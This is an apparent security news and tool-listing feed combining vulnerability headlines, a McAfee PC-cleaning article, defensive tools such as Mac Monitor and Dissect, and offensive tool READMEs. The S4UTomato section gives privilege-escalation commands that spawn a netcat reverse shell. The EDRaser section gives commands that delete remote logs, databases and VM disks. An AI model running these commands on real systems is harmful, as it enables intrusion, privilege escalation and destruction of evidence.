  2. The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.
  3. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.
  4. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.


The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

  • Windows Server 2022 x64
  • Windows Server 2016 x64
  • Windows Server 2012 R2 x64
  • Windows Server 2008 x86
  • Windows 7 SP1 x64

Known Issues

  • The start menu is not functional.


☐ ☆ ✇ The Hacker News

New Flaws in Fingerprint Sensors Let Attackers Bypass Windows Hello Login

By: Newsroom — November 22nd 2023 at 15:23
A new research has uncovered multiple vulnerabilities that could be exploited to bypass Windows Hello authentication on Dell Inspiron 15, Lenovo ThinkPad T14, and Microsoft Surface Pro X laptops. The flaws were discovered by researchers at hardware and software product security and offensive research firm Blackwing Intelligence, who found the weaknesses in the fingerprint sensors from Goodix,
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Red Canary Mac Monitor - An Advanced, Stand-Alone System Monitoring Tool Tailor-Made For macOS Security Research

By: Zion3R — November 9th 2023 at 11:30

Red Canary Mac Monitor is an advanced, stand-alone system monitoring tool tailor-made for macOS security research, malware triage, and system troubleshooting. Harnessing Apple Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to surface only the events that are relevant to you. The telemetry collected includes process, interprocess, and file events in addition to rich metadata, allowing users to contextualize events and tell a story with ease. With an intuitive interface and a rich set of analysis features, Red Canary Mac Monitor was designed for a wide range of skill levels and backgrounds to detect macOS threats that would otherwise go unnoticed. As part of Red Canary’s commitment to the research community, the Mac Monitor distribution package is available to download for free.


  • Processor: We recommend an Apple Silicon machine, but Intel works too!
  • System memory: 4GB+ is recommended
  • macOS version: 13.1+ (Ventura)

How can I install this thing?

Homebrew? brew install --cask red-canary-mac-monitor

  • Go to the releases section and download the latest installer:
  • Open the app: Red Canary Mac
  • You'll be prompted to "Open System Settings" to "Allow" the System Extension.
  • Next, System Settings will automatically open to Full Disk Access -- you'll need to flip the switch to enable this for the Red Canary Security Extension. Full Disk Access is a requirement of Endpoint Security.
  • ️ Click the "Start" button in the app and you'll be prompted to reopen the app. Done!

Install footprint

  • Event monitor app which establishes an XPC connection to the Security Extension: /Applications/Red Canary Mac w/signing identifier of com.redcanary.agent.
  • Security Extension: /Library/SystemExtensions/../com.redcanary.agent.securityextension.systemextension w/signing identifier of com.redcanary.agent.securityextension.systemextension.


Homebrew? brew uninstall red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • From the Finder delete the app and authenticate to remove the System Extension. You can't do this from the Dock. It's that easy!
  • You can also just remove the Security Extension if you want in the app's menu bar or by going into the app settings.
  • (1.0.3) Supports removal using the ../Contents/SharedSupport/ script.

How are updates handled?

Homebrew? brew update && brew upgrade red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • When a new version is available for you to download we'll make a new release.
  • We'll include updated notes and telemetry summaries (if applicable) for each release.
  • All you, as the end user, will need to do is download the update and run the installer. We'll take care of the rest .

How to use this repository

Here we'll be hosting:

  • The distribution package for easy install. See the Releases section. Each major build corresponds to a code name. The first of these builds is GoldCardinal.
  • Telemetry reports in Telemetry reports/ (i.e. all the artifacts that can be collected by the Security Extension).
  • Iconography (what the symbols and colors mean) in Iconography/
  • Updated mute set summaries in Mute sets/
  • AtomicESClient is a seperate, but very closely related project showing the ropes of Endpoint Security check it out in: AtomicESClient/

Additionally, you can submit feature requests and bug reports here as well. When creating a new Issue you'll be able to use one of the two provided templates. Both of these options are also accessible from the in-app "Help" menu.

How are releases structured?

Each release of Red Canary Mac Monitor has a corresponding build name and version number. The first release has the build name of: GoldCardinal and version number 1.0.1.

What are some standout features?

  • High fidelity ES events modeled and enriched with some events containing further enrichment. For example, a process being File Quarantine-aware, a file being quarantined, code signing certificates, etc.

  • Dynamic runtime ES event subscriptions. You have the ability to on-the-fly modify your event subscriptions -- enabling you to cut down on noise while you're working through traces.

  • Path muting at the API level -- Apple's Endpoint Security team has put a lot of work recently into enabling advanced path muting / inversion capabilities. Here, we cover the majority of the API features: es_mute_path and es_mute_path_events along with the types of ES_MUTE_PATH_TYPE_PREFIX, ES_MUTE_PATH_TYPE_LITERAL, ES_MUTE_PATH_TYPE_TARGET_PREFIX, and ES_MUTE_PATH_TYPE_TARGET_LITERAL. Right now we do not support inversion. I'd love it if the ES team added inversion on a per-event basis instead of per-client.

  • Detailed event facts. Right click on any event in a table row to access event metadata, filtering, muting, and unsubscribe options. Core to the user experience is the ability to drill down into any given event or set of events. To enable this functionality we’ve developed “Event facts” windows which contain metadata / additional enrichment about any given event. Each event has a curated set metadata that is displayed. For example, process execution events will generally contain code signing information, environment variables, correlated events, etc. Below you see examples of file creation and BTM launch item added event facts.

  • Event correlation is an exceptionally important component in any analyst's tool belt. The ability to see which events are "related" to one-another enables you to manipulate the telemetry in a way that makes sense (other than simply dumping to JSON or representing an individual event). We perform event correlation at the process level -- this means that for any given event (which have an initiating and/or target process) we can deeply link events that any given process instigated.

  • Process grouping is another helpful way to represent process telemetry around a given ES_EVENT_TYPE_NOTIFY_EXEC or ES_EVENT_TYPE_NOTIFY_FORK event. By grouping processes in this way you can easily identify the chain of activity.

  • Artifact filtering enabled users to remove (but not destroy) events from view based on: event type, initiating process path, or target process path. This standout feature enables analysts to cut through the noise quickly while still retaining all data.

    • Lossy filtering (i.e. events that are dropped from the trace) is also available in the form of "dropping platform binaries" -- another useful technique to cut through the noise.

  • Telemetry export. Right now we support pretty JSON and JSONL (one JSON object per-line) for the full or partial system trace (keyboard shortcuts too). You can access these options in the menu bar under "Export Telemetry".
  • Process subtree generation. When viewing the event facts window for any given event we’ll attempt to generate a process lineage subtree in the left hand sidebar. This tree is intractable – click on any process and you’ll be taken to its event facts. Similarly, you can right click on any process in the tree to pop out the facts for that event.
  • Dynamic event distribution chart. This is a fun one enabled by the SwiftUI team. The graph shows the distribution of events you're subscribed to, currently in-scope (i.e. not filtered), and have a count of more than nothing. This enables you to very quickly identify noisy events. The chart auto-shows/hides itself, but you can bring it back with the: "Mini-chart" button in the toolbar.

Some other features

  • Another very important feature of any dynamic analysis tool is to not let an event limiter or memory inefficient implementation get in the way of the user experience. To address this (the best we currently can) we’ve implemented an asynchronous parent / child-like Core Data stack which stores our events as “entities” in-memory. This enables us to store virtually unlimited events with Mac Monitor. Although, the time of insertions does become more taxing as the event limit gets very large.
  • Since Mac Monitor is based on a Security Extension which is always running in the background (like an EDR sensor) we baked in functionality such that it does not process events when a system trace is not occurring. This means that the Red Canary Security Extension (com.redcanary.agent.securityextension) will not needlessly utilize resources / battery power when a trace is not occurring.
  • Distribution package: The install process is often overlooked. However, if users do not have a good understanding of what’s being installed or if it’s too complex to install the barrier to entry might be just high enough to dissuade people from using it. This is why we ship Mac Monitor as a notarized distribution package.

Can you open source Mac Monitor?

We know how much you would love to learn from the source code and/or build tools or commercial products on top of this. Currently, however, Mac Monitor will be distributed as a free, closed-source tool. Enjoy what's being offered and please continue to provide your great feedback. Additionally, never hesitate to reach out if there's one aspect of the implementation you'd love to learn more about. We're an open book when it comes to geeking out about all things implementation, usage, and research methodology.

☐ ☆ ✇ The Hacker News

Researchers Find 34 Windows Drivers Vulnerable to Full Device Takeover

By: Newsroom — November 2nd 2023 at 08:59
As many as 34 unique vulnerable Windows Driver Model (WDM) and Windows Driver Frameworks (WDF) drivers could be exploited by non-privileged threat actors to gain full control of the devices and execute arbitrary code on the underlying systems. "By exploiting the drivers, an attacker without privilege may erase/alter firmware, and/or elevate [operating system] privileges," Takahiro Haruyama, a
☐ ☆ ✇ The Hacker News

Hackers Using MSIX App Packages to Infect Windows PCs with GHOSTPULSE Malware

By: Newsroom — October 30th 2023 at 04:21
A new cyber attack campaign has been observed using spurious MSIX Windows app package files for popular software such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex to distribute a novel malware loader dubbed GHOSTPULSE. "MSIX is a Windows app package format that developers can leverage to package, distribute, and install their applications to Windows users," Elastic
☐ ☆ ✇ McAfee Blogs

Does PC Cleaning Improve Performance?

By: McAfee — September 29th 2023 at 20:56

If you’re facing issues with your PC’s performance or just want to upkeep it, regular cleaning should be on your to-do list. Cleaning up your PC has several advantages, including speeding up your system and safeguarding your personal information from potential threats. Besides, the process frees up storage space, enabling you to install more programs or store more multimedia files. A monthly clean-up is usually recommended for optimal results. Those who have never cleaned their PC might be in for a pleasant surprise with its much-enhanced speed and improved performance. In this guide, we will explain the ins and outs of PC cleaning to help you on the right path.

Understanding PC Cleaning

Over time, as you store multiple files on your PC, they begin to take up more and more space. Specifically, your C drive might be gradually filling up due to backup files, hidden files, and temporary files. Additionally, even a new PC can benefit from a cleaning since it often comes with pre-installed programs that you might not need. So, what is PC cleaning? Essentially, it involves deleting unneeded files from your system when you want to free up storage space and enhance the overall performance of your PC.

Assessing Program Usage on Your PC

One of the first steps in PC cleaning involves removing unwanted programs. This can be done by accessing the ‘Programs and Features’ section of your control panel. As a necessary measure, go through the list and note down the programs that you don’t use. If you encounter programs you don’t recognize, perform a quick internet search to understand their function before deleting them. Depending on the program’s size, removing them may not take long. Alongside removing unneeded programs, you can also use the disk cleanup utility to remove temporary files, which is another crucial aspect of PC cleaning.

McAfee Pro Tip: You may find Potentially Unwanted Programs (PUP) while cleaning your computer. PUPs are not malware. The big thing to remember is that with PUPs, you’re saying “yes” to the download, even if you’re not fully aware of it because you didn’t read the fine print in the agreements or installation steps. However, Certain PUPs come bundled with spyware like keyloggers and dialers, as well as other software designed to collect your data, putting you at risk of identity theft. On the other hand, some may bombard your device with bothersome advertisements. Learn more about PUPs to avoid downloading them unknowingly. 

Cleaning Temporary Files

Temporary files consist of internet cookies and partially downloaded programs that were never installed on your system. Internet cookies store information such as user login credentials and images from websites visited. They primarily identify users and possibly prepare customized web pages or save necessary information. One of the advantages of these cookies is that they save you from entering your login information each time you visit a website. Moreover, web pages and online media you visit are stored in your browser’s cache, speeding up the browsing experience during your next visit.

The Importance of PC Cleaning

Your PC automatically stores files from the websites you visit on your hard drive. If not removed, these files accumulate over time and take up a significant amount of space on your PC. People often install programs on their PCs and forget to remove them after use, consuming much more space than they might think. Regular PC cleaning is an effective solution to prevent such issues.

Dig Deeper: What Is Disk Cleanup And Does It Remove Viruses?

Can Deleting Files Make Your PC Faster?

While many believe that deleting files from their hard drive can increase the speed of their PC, the effect might not be as substantial as expected. Your temporary internet files can quicken the speed at which websites load because these files contain images and other media from the websites you visit. Thus, your PC doesn’t have to download them whenever you visit the same websites. However, it’s still a good practice to delete your temporary files occasionally to free up disk space.

Removing Startup Items

Some programs that you download start automatically when you turn your PC on. Although automatic startup processes are beneficial for some programs, having too many can slow down your PC. It’s advisable to manage which apps run automatically during startup to enhance PC performance.

Factors to Consider When Cleaning Your PC

While deleting temporary internet files doesn’t pose much risk, deleting the wrong programs or certain startup items can harm your PC. Start by removing temporary files and reducing startup items to see if there’s a performance improvement. Additionally, when deleting programs, it’s crucial to be fully aware of what you’re deleting to avoid problems later on.

Cleaning Sensitive Files

When you delete files from the recycle bin, they remain on your system as the deletion only removes the pointer, not the file itself. Using a file shredder can help you erase such data by overwriting the space with a pattern of 1’s and 0’s. Although this doesn’t necessarily improve performance, it helps ensure compliance with the law and prevents identity theft.

Why Cleaning Your PC is Essential?

When you own a computer, much like a car, regular maintenance and cleaning are essential. While it might not entirely increase your PC’s speed, it greatly improves efficiency and functionality, making all processes run smoother. This is because each time you visit a webpage, your computer stores all types of files to remember the website and load it faster next time. This cache gets flooded with files over time, slowing down your system. PC cleaning allows your PC to breathe, making it more responsive and liberating the storage space. Significantly, it helps in data management, eliminating all unnecessary data that might be misused or lead to identity theft.

Dig Deeper: Manage your data this Data Privacy Day

Regular PC cleaning could also potentially save your device from significant damage. Unwanted programs and apps, especially those auto-starting ones, not only consume your system’s resources but also can contain malicious content impacting your PC. Regular cleaning will ensure any potential malware or problematic software is identified and removed promptly, thus adding a layer of protection.

How Does PC Cleaning Actually Work?

Let’s break down the PC cleaning process to simplify and understand it better. The process commences with uninstalling any unused apps and software. The next step involves clearing out temporary files, such as cache and cookies that accumulate over time and eat up storage space. Some PC cleaning programs also offer registry cleaning, which involves cleaning up the database that holds all the configuration settings for your PC. However, this is not always recommended.

Dig Deeper: To Disable or Enable Cookies

Startup programs are another key area to look into. Having too many programs that start up when your computer boots can substantially slow down your system. Through PC cleaning, you can manage these programs and ensure only the necessary ones are allowed to auto-start. This will provide a noticeable improvement in your PC’s boot time and overall performance. Lastly, most PC cleaners come equipped with a file shredder that securely deletes sensitive files and ensures they can’t be recovered later. This helps in safeguarding your personal data and optimizing your PC’s performance.

A Cleaning Schedule and Careful Cleaning

Having a cleaning schedule for your PC enhances its performance over a longer time. A weekly check to scan and remove any threats or malware, monthly cleanup of temporary files, and a deep clean every six months can keep your PC in optimal condition. However, while deleting temporary files and unused applications is generally safe, it’s important to be careful when choosing files or applications to delete since deleting system files or vital applications can cause serious, potentially irreversible, damage to your PC.

It’s advisable to stick to cleaning procedures and tools you understand. Research and be sure of your actions before you delete anything you’re unsure about. Admittedly, this can be a time-consuming and tedious process. Thankfully, dedicated PC cleaning tools can simplify the task, autotomize the process, and eliminate the risk of unwittingly causing damage.

The Role of PC Cleaning Software

PC cleaning software, like McAfee’s Total Protection, simplifies the process of cleaning your PC. These programs are designed to detect and clear out unnecessary files, manage startup apps, and even clean the registry, often at the press of a button. It’s crucial, though, to choose a reliable and safe PC cleaning software as some can be excessive, doing more harm than good, or even carry malware. Reading reviews and understanding what each feature does is important before using PC cleaning software.

These cleaners usually come with customizable settings to suit your preferences. You can set automatic clean-ups at regular intervals, thus saving time and freeing you from the hassle of remembering to run the cleanup. A good PC cleaner should ideally also come with a file shredder to safely delete sensitive or personal files without leaving a trace.

Final Thoughts

Cleaning your PC is an essential part of maintaining its performance. While it might not drastically increase your PC’s speed, it contributes to overall efficiency, responsiveness, and longevity. It’s important to approach PC cleaning carefully, deleting with discretion to avoid accidentally removing necessary files or applications. For those who aren’t comfortable doing it manually, reliable PC cleaning software like McAfee Total Protection can simplify the process and save time. Regular cleaning keeps your PC running smoothly, prevents potential threats, and ensures your personal and sensitive information is safe. So, if you haven’t started yet, it’s never too late to begin cleaning your PC and enjoy an optimized computing experience.

The post Does PC Cleaning Improve Performance? appeared first on McAfee Blog.

☐ ☆ ✇ The Hacker News

Microsoft to Phase Out NTLM in Favor of Kerberos for Stronger Authentication

By: Newsroom — October 14th 2023 at 06:29
Microsoft has announced that it plans to eliminate NT LAN Manager (NTLM) in Windows 11 in the future, as it pivots to alternative methods for authentication and bolster security. "The focus is on strengthening the Kerberos authentication protocol, which has been the default since 2000, and reducing reliance on NT LAN Manager (NTLM)," the tech giant said. "New features for Windows 11 include
☐ ☆ ✇ The Hacker News

Microsoft Releases October 2023 Patches for 103 Flaws, Including 2 Active Exploits

By: Newsroom — October 11th 2023 at 07:00
Microsoft has released its Patch Tuesday updates for October 2023, addressing a total of 103 flaws in its software, two of which have come under active exploitation in the wild. Of the 103 flaws, 13 are rated Critical and 90 are rated Important in severity. This is apart from 18 security vulnerabilities addressed in its Chromium-based Edge browser since the second Tuesday of September. The two
☐ ☆ ✇ Krebs on Security

Patch Tuesday, October 2023 Edition

By: BrianKrebs — October 10th 2023 at 22:51

Microsoft today issued security updates for more than 100 newly-discovered vulnerabilities in its Windows operating system and related software, including four flaws that are already being exploited. In addition, Apple recently released emergency updates to quash a pair of zero-day bugs in iOS.

Apple last week shipped emergency updates in iOS 17.0.3 and iPadOS 17.0.3 in response to active attacks. The patch fixes CVE-2023-42724, which attackers have been using in targeted attacks to elevate their access on a local device.

Apple said it also patched CVE-2023-5217, which is not listed as a zero-day bug. However, as Bleeping Computer pointed out, this flaw is caused by a weakness in the open-source “libvpx” video codec library, which was previously patched as a zero-day flaw by Google in the Chrome browser and by Microsoft in Edge, Teams, and Skype products. For anyone keeping count, this is the 17th zero-day flaw that Apple has patched so far this year.

Fortunately, the zero-days affecting Microsoft customers this month are somewhat less severe than usual, with the exception of CVE-2023-44487. This weakness is not specific to Windows but instead exists within the HTTP/2 protocol used by the World Wide Web: Attackers have figured out how to use a feature of HTTP/2 to massively increase the size of distributed denial-of-service (DDoS) attacks, and these monster attacks reportedly have been going on for several weeks now.

Amazon, Cloudflare and Google all released advisories today about how they’re addressing CVE-2023-44487 in their cloud environments. Google’s Damian Menscher wrote on Twitter/X that the exploit — dubbed a “rapid reset attack” — works by sending a request and then immediately cancelling it (a feature of HTTP/2). “This lets attackers skip waiting for responses, resulting in a more efficient attack,” Menscher explained.

Natalie Silva, lead security engineer at Immersive Labs, said this flaw’s impact to enterprise customers could be significant, and lead to prolonged downtime.

“It is crucial for organizations to apply the latest patches and updates from their web server vendors to mitigate this vulnerability and protect against such attacks,” Silva said. In this month’s Patch Tuesday release by Microsoft, they have released both an update to this vulnerability, as well as a temporary workaround should you not be able to patch immediately.”

Microsoft also patched zero-day bugs in Skype for Business (CVE-2023-41763) and Wordpad (CVE-2023-36563). The latter vulnerability could expose NTLM hashes, which are used for authentication in Windows environments.

“It may or may not be a coincidence that Microsoft announced last month that WordPad is no longer being updated, and will be removed in a future version of Windows, although no specific timeline has yet been given,” said Adam Barnett, lead software engineer at Rapid7. “Unsurprisingly, Microsoft recommends Word as a replacement for WordPad.”

Other notable bugs addressed by Microsoft include CVE-2023-35349, a remote code execution weakness in the Message Queuing (MSMQ) service, a technology that allows applications across multiple servers or hosts to communicate with each other. This vulnerability has earned a CVSS severity score of 9.8 (10 is the worst possible). Happily, the MSMQ service is not enabled by default in Windows, although Immersive Labs notes that Microsoft Exchange Server can enable this service during installation.

Speaking of Exchange, Microsoft also patched CVE-2023-36778,  a vulnerability in all current versions of Exchange Server that could allow attackers to run code of their choosing. Rapid7’s Barnett said successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell session.

For a more detailed breakdown on the updates released today, see the SANS Internet Storm Center roundup. If today’s updates cause any stability or usability issues in Windows, will likely have the lowdown on that.

Please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

☐ ☆ ✇ KitPloit - PenTest Tools!

S4UTomato - Escalate Service Account To LocalSystem Via Kerberos

By: Zion3R — October 7th 2023 at 11:30

Escalate Service Account To LocalSystem via Kerberos.

Traditional Potatoes

Friends familiar with the "Potato" series of privilege escalation should know that it can elevate service account privileges to local system privileges. The early exploitation techniques of "Potato" are almost identical: leveraging certain features of COM interfaces, deceiving the NT AUTHORITY\SYSTEM account to connect and authenticate to an attacker-controlled RPC server. Then, through a series of API calls, an intermediary (NTLM Relay) attack is executed during this authentication process, resulting in the generation of an access token for the NT AUTHORITY\SYSTEM account on the local system. Finally, this token is stolen, and the CreatePr ocessWithToken() or CreateProcessAsUser() function is used to pass the token and create a new process to obtain SYSTEM privileges.

How About Kerberos

In any scenario where a machine is joined to a domain, you can leverage the aforementioned techniques for local privilege escalation as long as you can run code under the context of a Windows service account or a Microsoft virtual account, provided that the Active Directory hasn't been hardened to fully defend against such attacks.

In a Windows domain environment, SYSTEM, NT AUTHORITY\NETWORK SERVICE, and Microsoft virtual accounts are used for authentication by system computer accounts that are joined to the domain. Understanding this is crucial because in modern versions of Windows, most Windows services run by default using Microsoft virtual accounts. Notably, IIS and MSSQL use these virtual accounts, and I believe other applications might also employ them. Therefore, we can abuse the S4U extension to obtain the service ticket for the domain administrator account "Administrator" on the local machine. Then, with the help of James Forshaw (@tiraniddo)'s SCMUACBypass, we can use that ticket to create a system service and ga in SYSTEM privileges. This achieves the same effect as traditional methods used in the "Potato" family of privilege escalation techniques.

Before this, we need to obtain a TGT (Ticket Granting Ticket) for the local machine account. This is not easy because of the restrictions imposed by service account permissions, preventing us from obtaining the computer's Long-term Key and thus being unable to construct a KRB_AS_REQ request. To accomplish the aforementioned goal, I leveraged three techniques: Resource-based Constrained Delegation, Shadow Credentials, and Tgtdeleg. I built my project based on the Rubeus toolset.

How to Use and Examples

domain controller or LDAP server. -m, --ComputerName The new computer account to create. -p, --ComputerPassword The password of the new computer account to be created. -f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer object. -c, --Command Program to run. -v, --Verbose Output verbose debug information. --help Display this help screen. --version Display version information." dir="auto">
C:\Users\whoami\Desktop>S4UTomato.exe --help

S4UTomato 1.0.0-beta
Copyright (c) 2023

-d, --Domain Domain (FQDN) to authenticate to.
-s, --Server Host name of domain controller or LDAP server.
-m, --ComputerName The new computer account to create.
-p, --ComputerPassword The password of the new computer account to be created.
-f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer
-c, --Command Program to run.
-v, --Verbose Output verbose debug information.
--help Display this help screen.
--version Display version information.

LEP via Resource-based Constrained Delegation

S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 4444 -e cmd.exe"

LEP via Shadow Credentials + S4U2self

S4UTomato.exe shadowcred -c "nc 4444 -e cmd.exe" -f

LEP via Tgtdeleg + S4U2self

# First retrieve the TGT through Tgtdeleg
S4UTomato.exe tgtdeleg
# Then run SCMUACBypass to obtain SYSTEM privilege
S4UTomato.exe krbscm -c "nc 4444 -e cmd.exe"

☐ ☆ ✇ KitPloit - PenTest Tools!

Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

By: Zion3R — October 5th 2023 at 11:30

Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.

What is Dissect?

Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

Singular approach

And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

Create a lightweight container using Acquire

Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query and target-shell, but feel free to use other tools as well.

A modular setup

Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

Try it out now!

Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at to try Dissect in your browser.

Don’t know where to start? Check out the introduction page.

Want to get a detailed overview? Check out the overview page.

Want to read everything? Check out the documentation.


Dissect currently consists of the following projects.


These projects are closely related to Dissect, but not installed by this meta package.


This project is part of the Dissect framework and requires Python.

Information on the supported Python versions can be found in the Getting Started section of the documentation.


dissect is available on PyPI.

pip install dissect

Build and test instructions

This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

tox -e build

The build artifacts can be found in the dist/ directory.

tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:


For a more elaborate explanation on how to build and test the project, please see the documentation.

☐ ☆ ✇ The Hacker News

Microsoft is Rolling out Support for Passkeys in Windows 11

By: THN — September 26th 2023 at 17:04
Microsoft is officially rolling out support for passkeys in Windows 11 today as part of a major update to the desktop operating system. The feature allows users to login to websites and applications without having to provide a username and password, instead relying on their device PIN or biometric information to complete the step. Based on FIDO standards, Passkeys were first announced in May
☐ ☆ ✇ KitPloit - PenTest Tools!

EDRaser - Tool For Remotely Deleting Access Logs, Windows Event Logs, Databases, And Other Files

By: Zion3R — September 24th 2023 at 11:30

EDRaser is a powerful tool for remotely deleting access logs, Windows event logs, databases, and other files on remote machines. It offers two modes of operation: automated and manual.

Automated Mode

In automated mode, EDRaser scans the C class of a given address space of IPs for vulnerable systems and attacks them automatically. The attacks in auto mode are:

  • Remote deletion of webserver logs.
  • SysLog deletion (on Linux).
  • Local deletion of Windows Application event logs.
  • Remote deletion of Windows event logs.
  • VMX + VMDK deletion

To use EDRaser in automated mode, follow these steps:

python --auto

Manual Mode

In manual mode, you can select specific attacks to launch against a targeted system, giving you greater control. Note that some attacks, such as VMX deletion, are for local machine only.

To use EDRaser in manual mode, you can use the following syntax:

python --ip <ip_addr> --attack <attack_name> [--sigfile <signature file>]


  • --ip: scan IP addresses in the specified range and attack vulnerable systems (default: localhost).
  • --sigfile: use the specified encrypted signature DB (default: signatures.db).
  • --attack: attack to be executed. The following attacks are available: ['vmx', 'vmdk', 'windows_security_event_log_remote', 'windows_application_event_log_local', 'syslog', 'access_logs', 'remote_db', 'local_db', 'remote_db_webserver']

Optional arguments:

  • port : port of remote machine
  • ``
  • db_username: the username of the remote DB.
  • db_password: the password of the remote DB.
  • db_type: type of the DB, EDRaser supports mysql, sqlite. (# Note that for sqlite, no username\password is needed)
  • db_name: the name of remote DB to be connected to
  • table_name: the name of remote table to be connected to
  • rpc_tools: path to the VMware rpc_tools


python --attack windows_event_log --ip 

python -attack remote_db -db_type mysql -db_username test_user -db_password test_password -ip

DB web server

You can bring up a web interface for inserting and viewing a remote DB. it can be done by the following command: -attack remote_db_webserver -db_type mysql -db_username test_user -db_password test_password -ip

This will bring up a web server on the localhost:8080 address, it will allow you to view & insert data to a remote given DB. This feature is designed to give an example of a "Real world" scenario where you have a website that you enter data into it and it keeps in inside a remote DB, You can use this feature to manually insert data into a remote DB.

Available Attacks

In manual mode, EDRaser displays a list of available attacks. Here's a brief description of each attack:

  1. Windows Event Logs: Deletes Windows event logs from the remote targeted system.
  2. VMware Exploit: Deletes the VMX and VMDK files on the host machine. This attack works only on the localhost machine in a VMware environment by modifying the VMX file or directly writing to the VMDK files.
  3. Web Server Logs: Deletes access logs from web servers running on the targeted system by sending a malicious string user-agent that is written to the access-log files.
  4. SysLogs: Deletes syslog from Linux machines running Kaspersky EDR without being .
  5. Database: Deletes all data from the remotely targeted database.
